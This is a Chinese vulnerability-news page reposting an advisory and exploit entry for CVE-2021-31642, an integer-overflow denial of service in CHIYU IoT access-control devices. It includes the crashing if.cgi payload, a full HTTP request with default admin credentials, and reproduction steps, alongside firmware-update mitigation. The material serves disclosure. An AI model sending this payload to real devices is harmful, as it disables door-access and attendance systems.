华域联盟 漏洞资讯 CHIYU Technology IoT devices 安全漏洞

CHIYU Technology IoT devices 安全漏洞

CHIYU Technology IoT devices 安全漏洞

漏洞ID 2463741 漏洞类型 输入验证错误
发布时间 2021-06-06 更新时间 2021-06-10
CVE编号 CVE-2021-31642 CNNVD-ID CNNVD-202106-088
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2021060032


http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202106-088

|漏洞详情
Chiyu CHIYU BF-430是中国台湾七友科技(Chiyu)公司的一款为门禁、考勤系统等设备提供通讯的联网服务器。 CHIYU Technology IoT devices 存在安全漏洞,该漏洞源于出现整数溢出后存在拒绝服务状态。攻击者可利用该漏洞在页面参数上发送一个意外的整数(> 32位)来探测,这会使门户网站崩溃。以下产品及版本受到影响:BIOSENSE, Webpass, and BF-630, BF-631, SEMAC。
|漏洞EXP
# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)
# Date: 01/06/2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC   - all firmware versions < June 2021
# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC
# CVE: CVE-2021-31642
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.
CVE ID: CVE-2021-31642
CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642

Affected parameter: page=Component: if.cgi
Payload:
if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000

====HTTP request======
GET
/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/AccLog.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1



Steps to reproduce:
  1. Navigate to the vulnerable device
  2. Make a GET request to the CGI component (if.cgi)
  3. Append the payload at the end of the vulnerable parameter (page)
  4. Submit the request and observe payload execution


 Mitigation: The latest version of the CHIYU firmware should be installed
to mitigate this vulnerability.

|参考资料

来源:MISC

链接:https://www.chiyu-tech.com/msg/message-Firmware-update-87.html

来源:MISC

链接:https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/

来源:MISC

链接:https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642

本文由 华域联盟 原创撰写:华域联盟 » CHIYU Technology IoT devices 安全漏洞

转载请保留出处和原文链接:https://www.cnhackhy.com/94631.htm

本文来自网络,不代表华域联盟立场,转载请注明出处。

作者: sterben

发表回复

联系我们

联系我们

2551209778

在线咨询: QQ交谈

邮箱: [email protected]

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部